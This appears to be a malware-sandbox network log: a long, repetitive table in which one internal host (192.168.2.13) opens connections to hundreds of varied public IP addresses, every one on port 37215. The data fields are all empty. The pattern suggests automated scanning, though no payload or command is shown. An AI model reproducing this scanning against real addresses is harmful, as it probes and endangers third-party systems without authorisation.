                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10968192.168.2.134955441.170.76.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10969192.168.2.1337584114.123.144.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10970192.168.2.1356154197.134.64.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10971192.168.2.1336650109.189.251.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10972192.168.2.134039234.83.175.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10973192.168.2.1338902186.61.85.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10974192.168.2.1341488157.127.145.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10975192.168.2.13444544.85.240.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10976192.168.2.1351132213.155.63.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10977192.168.2.1350244197.161.176.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10978192.168.2.1344740197.65.124.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10979192.168.2.1346266157.251.53.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10980192.168.2.1357084195.164.92.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10981192.168.2.1336754197.204.181.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10982192.168.2.1340750197.177.138.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10983192.168.2.135848841.195.109.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10984192.168.2.1344754197.9.12.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10985192.168.2.134127441.49.132.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10986192.168.2.1336328157.187.53.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10987192.168.2.1342062157.16.136.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10988192.168.2.1355056181.42.24.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10989192.168.2.1339766186.131.219.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10990192.168.2.1353434143.152.62.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10991192.168.2.1337036112.232.137.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10992192.168.2.135133441.217.33.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10993192.168.2.1358428190.150.211.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10994192.168.2.1348032197.212.165.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10995192.168.2.1340040197.147.242.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10996192.168.2.1356672152.6.30.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10997192.168.2.1333044197.193.238.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10998192.168.2.133509657.159.233.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10999192.168.2.134706241.48.93.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11000192.168.2.135398241.204.199.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11001192.168.2.133296041.230.17.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11002192.168.2.134102441.66.244.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11003192.168.2.1347158157.156.59.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11004192.168.2.1349438157.225.82.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11005192.168.2.1359894143.33.114.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11006192.168.2.133465267.9.240.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11007192.168.2.1335770197.66.83.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11008192.168.2.1338274197.17.2.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11009192.168.2.135051241.150.86.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11010192.168.2.1347500197.81.227.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11011192.168.2.1347756157.25.105.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11012192.168.2.1339702157.40.41.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11013192.168.2.1345742197.137.175.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11014192.168.2.133419841.84.181.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11015192.168.2.1335922155.130.99.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11016192.168.2.1356298157.6.20.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11017192.168.2.134830841.78.105.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11018192.168.2.135689441.135.93.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11019192.168.2.134265041.233.210.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11020192.168.2.1356000197.204.238.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11021192.168.2.1355838197.46.103.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11022192.168.2.133901041.220.140.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11023192.168.2.135981441.205.125.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11024192.168.2.1348082157.221.202.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11025192.168.2.1333282197.16.27.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11026192.168.2.1356636197.83.108.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11027192.168.2.1338308157.43.220.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11028192.168.2.1339772181.179.22.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11029192.168.2.134213490.57.252.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11030192.168.2.1338880157.195.223.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11031192.168.2.1334638149.163.83.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11032192.168.2.1334066197.92.139.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11033192.168.2.133353447.12.161.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11034192.168.2.133758641.217.113.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11035192.168.2.1333700221.23.197.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11036192.168.2.134930441.182.194.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11037192.168.2.1337424197.67.114.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11038192.168.2.1355676178.172.77.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11039192.168.2.1355570197.142.33.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11040192.168.2.1353716157.70.112.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11041192.168.2.134965268.224.56.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11042192.168.2.134047683.16.153.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11043192.168.2.1340490157.217.251.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11044192.168.2.135073441.25.64.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11045192.168.2.1356360157.247.54.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11046192.168.2.1340658197.102.188.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11047192.168.2.135785874.3.185.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11048192.168.2.135375061.245.246.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11049192.168.2.133797259.228.68.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11050192.168.2.1342896157.218.31.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11051192.168.2.134277441.78.59.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11052192.168.2.1349982157.152.229.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11053192.168.2.135148641.167.209.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11054192.168.2.134259041.45.225.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11055192.168.2.1339932157.147.79.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11056192.168.2.13385722.167.112.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11057192.168.2.133635854.198.11.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11058192.168.2.1359972157.215.196.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11059192.168.2.1346288157.179.116.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11060192.168.2.1346468197.72.186.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11061192.168.2.133838241.29.153.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11062192.168.2.136084841.90.63.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11063192.168.2.1359138157.213.75.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11064192.168.2.1349632157.205.32.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11065192.168.2.13522228.154.169.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11066192.168.2.1356288197.105.167.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11067192.168.2.1348510199.117.241.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11068192.168.2.135955664.144.123.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11069192.168.2.1352380197.243.80.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11070192.168.2.1351762157.113.165.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11071192.168.2.1351644197.153.137.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11072192.168.2.1353240187.51.96.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11073192.168.2.1343954157.70.35.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11074192.168.2.135735241.73.218.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11075192.168.2.133582441.120.229.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11076192.168.2.1344012157.222.108.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11077192.168.2.133445642.1.226.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11078192.168.2.1339416197.144.78.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11079192.168.2.136055641.232.43.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11080192.168.2.1352102197.43.3.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11081192.168.2.1342914157.74.180.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11082192.168.2.1338598157.137.21.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11083192.168.2.1350644157.135.82.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11084192.168.2.1336156197.79.176.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11085192.168.2.1358664216.43.80.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11086192.168.2.1360044197.128.53.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11087192.168.2.1343510197.123.225.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11088192.168.2.135855641.13.216.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11089192.168.2.1355868157.54.154.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11090192.168.2.1354816197.226.207.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11091192.168.2.1336122157.238.189.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11092192.168.2.1346204197.0.245.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11093192.168.2.1359190167.26.157.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11094192.168.2.1360636197.86.26.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11095192.168.2.1349086157.134.102.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11096192.168.2.1334574157.162.212.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11097192.168.2.1359274197.134.133.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11098192.168.2.135372479.82.76.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11099192.168.2.134205641.179.17.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11100192.168.2.1332918125.102.30.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11101192.168.2.133333641.174.45.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11102192.168.2.1336252197.156.27.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11103192.168.2.1352486197.161.242.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11104192.168.2.1352500157.53.183.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11105192.168.2.1349286182.216.122.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11106192.168.2.1334098157.138.132.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11107192.168.2.1335736197.106.17.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11108192.168.2.136082441.188.191.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11109192.168.2.1359906157.103.136.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11110192.168.2.136050878.85.87.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11111192.168.2.1337208157.248.35.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11112192.168.2.1352622157.210.138.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11113192.168.2.1344364157.30.151.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11114192.168.2.134759220.111.36.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11115192.168.2.135311441.82.206.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11116192.168.2.134400450.61.181.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11117192.168.2.135625241.115.148.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11118192.168.2.135998841.14.82.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11119192.168.2.1343934197.145.102.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11120192.168.2.1354188157.223.109.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11121192.168.2.1359346197.56.191.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11122192.168.2.135978241.31.146.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11123192.168.2.133329841.86.254.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11124192.168.2.1337256157.248.22.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11125192.168.2.1351746213.26.46.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11126192.168.2.1348414157.99.83.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11127192.168.2.1357204157.78.20.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11128192.168.2.136014641.209.137.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11129192.168.2.134208041.208.150.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11130192.168.2.1358378157.21.73.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11131192.168.2.1358770157.143.239.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11132192.168.2.1344366125.39.29.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11133192.168.2.133314241.95.99.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11134192.168.2.1353672157.75.85.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11135192.168.2.13477368.46.183.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11136192.168.2.1356250197.27.220.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11137192.168.2.135018241.122.97.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11138192.168.2.1356832197.52.105.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11139192.168.2.1349892157.201.148.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11140192.168.2.1360976157.35.180.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11141192.168.2.136097241.210.131.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11142192.168.2.133566841.73.115.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11143192.168.2.134271059.115.23.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11144192.168.2.1352920157.13.223.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11145192.168.2.1337316148.228.73.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11146192.168.2.135065241.37.93.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11147192.168.2.1342728157.141.250.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11148192.168.2.133516441.35.98.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11149192.168.2.1344884197.90.178.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11150192.168.2.136060641.221.110.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11151192.168.2.134339652.18.115.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11152192.168.2.1359976157.108.174.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11153192.168.2.1333028157.102.246.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11154192.168.2.1336106116.191.54.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11155192.168.2.133804641.216.156.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11156192.168.2.1334106197.8.206.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11157192.168.2.1358526197.70.126.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11158192.168.2.134868641.197.40.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11159192.168.2.1334726157.149.161.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11160192.168.2.1357712197.211.161.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11161192.168.2.1333100197.66.128.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11162192.168.2.1348448157.98.169.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11163192.168.2.133533241.38.46.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11164192.168.2.135557041.6.1.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11165192.168.2.1357076157.88.89.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11166192.168.2.1357418197.247.133.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11167192.168.2.133513641.8.149.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11168192.168.2.135424692.119.78.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11169192.168.2.1354114197.15.49.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11170192.168.2.133824241.243.114.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11171192.168.2.1352306197.193.109.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11172192.168.2.133758041.181.180.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11173192.168.2.1352804197.11.239.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11174192.168.2.136064041.226.225.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11175192.168.2.1335874157.182.153.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11176192.168.2.1347724219.66.22.737215
                                                  TimestampBytes transferredDirectionData


